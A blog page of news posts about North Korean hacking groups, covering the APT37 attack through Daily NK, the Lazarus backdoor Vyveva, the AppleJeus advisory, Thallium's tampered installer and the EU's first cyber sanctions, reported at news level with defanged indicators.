Search This Blog

Showing posts with label North Korea. Show all posts

Internet Browser Vulnerabilities Exploited by North Korean Hackers to Implant Malware


A threat actor from North Korea has indeed been found exploiting two flaws in the Internet Explorer to attack individuals with a specialized implant, targeting a South Korean online daily newspaper as a component of strategic web compromise (SWC). 

Volexity, a cybersecurity firm, has accredited these attacks and operations to a threat actor recognized by the name InkySquid also better known by the monikers ScarCruft and APT37. It is indeed a widely known North Korean hackers' body. Daily NK — the publication of concern, is believed to have been host to the malevolent code from at least the end of March 2021 to early June 2021. 

InkySquid, the infamous North Korean hacker group has been leveraging the vulnerability since 2020 to upload falsified Javascript code that is usually buried within the genuine code in cyberattacks against an Internet Explorer browser. 

However, according to security researchers, earlier in April this year, Volexity identified a suspicious code loaded via www.dailynk[.]com onto unlawful jquery[.]services subdomains. There are two types of URLs identified, which are listed below:

  • hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
  • hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 

Further, Volexity experts have noted that the "clever disguise of exploit code amongst legitimate code" as well as the usage of bespoke malware allows attackers to escape detection. 

These attacks involved manipulating the jQuery JavaScript libraries on the website to serve further obscured code from a remote URL and use it to abuse the exploits of two Internet Explorer vulnerabilities that were addressed by Microsoft in August 2020 and March 2021. A Cobalt Strike stagger, as well as the BLUELIGHT new backdoor, have successfully been deployed. 

  • CVE-2020-1380 (CVSS score: 7.5) - Scripting Engine Memory Corruption Vulnerability 
  • CVE-2021-26411 (CVSS score: 8.8) - Internet Explorer Memory Corruption Vulnerability 

It must be mentioned that both the vulnerabilities were actively leveraged in the wild by the North Korean hackers using them to target security scientists working in research and development on vulnerabilities in an operation that was uncovered earlier in January. 

After the timely implementation of the Cobalt Strike, BLUELIGHT is employed as a secondary payload, as a full-featured remote access technique that allows total access to an affected system. 

Along with obtaining system metadata and antivirus product information, malware can execute shellcodes, collect cookies and credentials through Internet Explorer, Microsoft Edge, and Google Chrome browsers, acquire files, and install arbitrary runs that are exfiltrated to a remote server.

North Korean Lazarus Group Attacks South African Freight Via New Weapon


The North Korean-backed Lazarus hacking group employed a new backdoor in targeted attacks against a South African freight and logistics company. ESET researchers first discovered the malware in June 2020, but further evidence suggests Lazarus has been using it in previous attacks going back to at least December 2020. 

The new backdoor malware, dubbed Vyveva is one of the latest tools discovered in the Lazarus armory. Vyveva has the capability of exfiltrating files, gathering data from an exploited machine and its drives, remotely connect to a command-and-control (C2) server and run arbitrary code. It also uses watchdogs to keep track of newly connected drives or the active user sessions to trigger new C2 connections on new sessions or drive events.

While ESET researchers have not gained much success in identifying the initial compromise vector but they have discovered three main components comprising Vyveva – its installer, loader and backdoor. Vyveva also consists a ‘timestomping’ option which allows its operators to manipulate any file’s data using metadata from other files on the system or by setting a random date between 2000 and 2004 to hide new or modified files. 

“Vyveva shares multiple code similarities with older Lazarus samples that are detected by ESET technology. However, the similarities do not end there: the use of a fake TLS protocol in network communication, command-like execution chains, and the methods of using encryption and Tor services all point toward Lazarus. Hence, we can attribute Vyveva to this APT group with high confidence,” security researcher Filip Jurcacko stated.

According to the US government, Lazarus group was formed in 2007 and since then, as per the researchers, the group has been responsible for the $80 million Bangladeshi bank heist and the HaoBao Bitcoin-stealing campaign. The Lazarus Group’s activities were widely reported only after it was blamed for the 2014 cyber-attack on Sony Pictures Entertainment and the 2017 WannaCry ransomware attack on the countries including the US and Britain.

US Agencies Publish Advisory on North Korean Cryptocurrency Malware, AppleJeus


The Federal Bureau of Investigation (FBI) jointly with the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of the Treasury, released an advisory on North Korea's cyber-threat to cryptocurrency and on suggestions for mitigating. 

Operated with the US government allies, FBI, CISA and the Treasury assess that, Lazarus Group –advanced persistent threat (APT) actors assisted by these agencies in North Korea is targeting the consumers and firms through the dissemination of cryptocurrency trading apps, including crypto-currency exchange and financial service providers, that have been updated to cover. 

“This advisory marks another step by the U.S. Government to counter the ongoing and criminal North Korean global cryptocurrency theft scheme targeting finance, energy, and other sectors,” said CISA Acting Executive Assistant Director of Cybersecurity Matt Hartman. “The FBI, Treasury, and CISA continue to assess the evolving cyber threat posed by North Korea, cybercriminals, and other nation-state actors and are committed to providing organizations timely information and mitigations to combat these threats.” 

In the last year alone, these cyber actors attacked organizations for cryptocurrency theft, in more than 30 nations. These actors would undoubtedly see amended cryptocurrency trade applications as a way of bypassing North Korea's foreign sanctions—applications that allow them to gain access to cryptocurrency exchanges and loot cryptocurrency cash from victims' accounts. 

The US government refers to the North Korean Government's malicious cyber activity as HIDDEN COBRA. Malware and indicators of compromise (IOCs) have been identified by the United States Government to facilitate North Korean cryptocurrency robbery, which is called "AppleJeus" by the Cyber Security community. 

Although the malware was first found in 2018, North Korea has used several versions of AppleJeus. In the first place, HIDDEN COBRA actors used websites that seemed to host genuine cryptocurrency trading platforms, but these actors seem to be using other infection feature vectors, such as phishing, social networking, and social engineering, to get users to download the malware and to infect victims with AppleJeus. They are also using other infection vectors. Active AppleJeus Malware agencies in several areas, including energy, finances, government, industry, technology, and telecommunications, were targeted by HIDDEN COBRA actors. 

Ever since it was discovered, several variants of AppleJeus were found in the wild. Most of them are supplied as relatively simple applications from attacker-controlled websites that resemble legitimate cryptocurrency exchange sites and firms. 

“It is likely that these actors view modified cryptocurrency trading applications as a means to circumvent international sanctions on North Korea — the applications enable them to gain entry into companies that conduct cryptocurrency transactions and steal cryptocurrency from victim accounts,” states the report. 

If consumers perceive that they have been affected by AppleJeus, the findings suggest victims creating new keys or transferring funds from corrupted crypto wallets, expelling hosts, running anti-malware tests on tainted devices, and notifying the FBI, CISA, or treasury.

Is North Korea Planning Something Bigger in the Field of Cyber Crime ?


North Korea is excelling in a field of cybercrime with each passing day despite the tight economic sanctions levied by the United Nations and the United States of America in 2006 to prevent North Korea of the necessary funds for its nuclear program. North Korea has boosted its cyber capabilities by exploiting digital susceptibilities across the globe.

North Korea’s hacking groups code-named Lazarus Group or Hidden Cobra have launched several cyber-attacks across the globe to extort money for its banned nuclear weapons development program. Lazarus was suspected of being the driving force behind the famous robbery of nearly $80 million from the Bangladeshi Central Bank.

US Department of Homeland and the FBI in 2017 released a cybersecurity bulletin explaining the connection of North Korea to several cyber-attacks on US businesses and critical infrastructure. In May 2020 North Korea recruited nearly 100 science and technology university graduates into its military forces to oversee its tactical planning systems. Approximately 100 hackers graduate from Mirim College, also known as the University of Automation.

As per the reports of defector testimony, North Korea is training graduates from Mirim College to dismantle Microsoft Windows Operating Systems, build destructive computer viruses and write code in various computer programming languages. WannaCry ransomware a North Korean-led cyberattack in 2017, which wrought havoc in more than 300,000 computers in 150 countries by exploiting vulnerabilities in the Microsoft Windows operating system.

According to US Army reports, the alarming thing is that North Korea is not acting alone, North Korea has recruited nearly 6,000 cyber agents across the globe in four intelligence organizations. China is one of the North Korea supporters, it helps North Koreans illicit cyber activities via training and academic intrusion. North Korean students often study at topmost Chinese science and technology universities such as the Harbin Institute of Technology (HIT) where they have access to advanced technology and equipment which are unavailable in their home country due to U.S. and U.N. sanctions.

In November 2019, the North Korean Chairman of the Education and the Chinese Ministry of Education jointly signed the China-North Korea Education and Cooperation Agreement (2020-2030) to reinforce academic partnerships and postgraduate student exchanges. This tie-up was done to increase foreign exchange and higher education training programs which may lead to increased cybercrime, given the nature of these science and technology universities.

The U.S. government continues to expose new and dangerous cyber groups that pose a serious threat to international security and U.S. national interests. However, all is not lost for the United States and its global allies, the U.S. Department of Justice can mandate cybersecurity audits for U.S. banks and financial institutions as part of deferred prosecution agreements to boost compliance with the basic cybersecurity structure described by the Cybersecurity and Infrastructure Security Agency (CISA) and Financial Action Task Force (FATF).

Thallium Altered the Installer of a Stock Investment App


This week, ESTsecurity Security Response Center (ESRC) gave an account of a North Korean hacking group altering a private stock investment messaging application to deliver malevolent code. The gathering known as Thallium delivered a Windows executable utilizing Nullsoft Scriptable Install System (NSIS), a famous script-driven installer authoring tool for Microsoft Windows. This North Korean hacking group Thallium, colloquially known as APT37 has targeted clients of a private stock investment courier service in a software supply chain attack, as indicated by a report distributed recently. Not long ago, the group essentially depended on phishing assaults, for example, using Microsoft Office records, to focus on its victims. Thallium is presently utilizing different ways, for instance, transporting infected Windows installers and macro-laden Office records to go after investors.

The Windows executable contained malevolent code with the authentic files from a legitimate stock investment application program. ESTsecurity researchers demonstrated two manners by which the assailants influence the "XSL Script Processing" method. Inside the authentic installer of the stock investment platform, aggressors infused explicit orders that got a malignant XSL content from a maverick FTP server and executed it on Windows systems employing the in-built wmic.exe utility. 

The subsequent installer, repackaged with Nullsoft's NSIS, would give off the impression as though the client was installing the genuine stock investment application while discreetly sliding the malicious contents out of sight. The following phase of assault executes a VBScript to make documents and folders named 'OracleCache', 'PackageUninstall', and 'USODrive' among others in the %ProgramData% index. The payload at that point interfaces with the command-and-control (C2) server facilitated on frog.smtper[.]co to get extra commands. By making a maverick scheduled task called activate under a deceptive directory 'Office 365__\Windows\Office', the malware accomplishes continuity by instructing Windows Scheduler to run the dropped code every 15 minutes. These criminals observe the tainted system and after an initial screening, deployed a Remote Access Trojan (RAT) on the machine.

ESTsecurity researchers additionally noticed Microsoft Office documents, for example, Excel spreadsheets that contained macros were disturbing the previously mentioned XSL script payload. "ESRC is focusing on the way that the Thallium association is utilizing the 'XSL Script Processing' method not just in spear-phishing assaults dependent on noxious documents, yet besides for niche assaults including supply chain assaults," experts at ESTsecurity further said.

The Council of the EU and Its First-Ever Sanctions against Persons or Entities Involved in Various Cyber-Attacks

The Council of the European Union imposed its first-ever sanction against persons or entities engaged with different cyber-attacks focusing on European citizens and its member states. 

The sanctions imposed include a ban for people traveling to any EU nations and a freeze of assets on persons and entities. 

The order has been issued against six individuals and three entities liable for or associated with different cyber-attacks. Out of the six individuals sanctioned they include two Chinese citizens and four Russian nationals. 

The companies associated with carrying out these cyber-attacks incorporate an export firm situated in North Korea, and technology companies from China and Russia.

The entities responsible for or engaged with different cyber-attacks incorporate some publicly referred to ones as 'WannaCry', 'NotPetya', and 'Operation Cloud Hopper,' just as an endeavored cyber-attack against the organization for the prohibition of chemical weapons.

As per the European Council, the detailed of these persons or entities are: 

 1. Two Chinese Individuals—Gao Qiang and Zhang Shilong—and a technology firm, named Tianjin Huaying Haitai Science and Technology Development Co. Ltd, for the Operation Cloud Hopper. 

 2. Four Russian nationals (also wanted by the FBI) — Alexey Valeryevich, Aleksei Sergeyvich, Evgenii Mikhaylovich, and Oleg Mikhaylovich—for attempting to target the Organisation for the Prohibition of Chemical Weapons (OPCW), in the Netherlands. 

 3. A Russian technology firm (exposed by the NSA) — Main Centre for Special Technologies (GTsST) of the Main Directorate of the General Staff of the Armed Forces of the Russian Federation—for the NotPetya ransomware attack in 2017 and the cyber-attacks directed at a Ukrainian power grid in the winter of 2015 and 2016. 

 4. A North Korean export firm — Chosun Expo, for the WannaCry ransomware attack that made havoc by disrupting information systems worldwide in 2017 and linked to the well-known Lazarus group. 

The Council says, “Sanctions are one of the options available in the EU's cyber diplomacy toolbox to prevent, deter and respond to malicious cyber activities directed against the EU or its member states, and today is the first time the EU has used this tool." 

As indicated by the European Union, the two Chinese nationals who carried out Operation Cloud Hopper are members from the APT10 threat actor group, otherwise called 'Red Apollo,' 'Stone Panda,' 'MenuPass' and 'Potassium.' 

On the other hand, the four Russian nationals were agents of the Russian Intelligence agency GRU who once expected to hack into the Wi-Fi network of the OPCW, which, if effective, would have permitted them to compromise the OPCW's on-going investigatory work.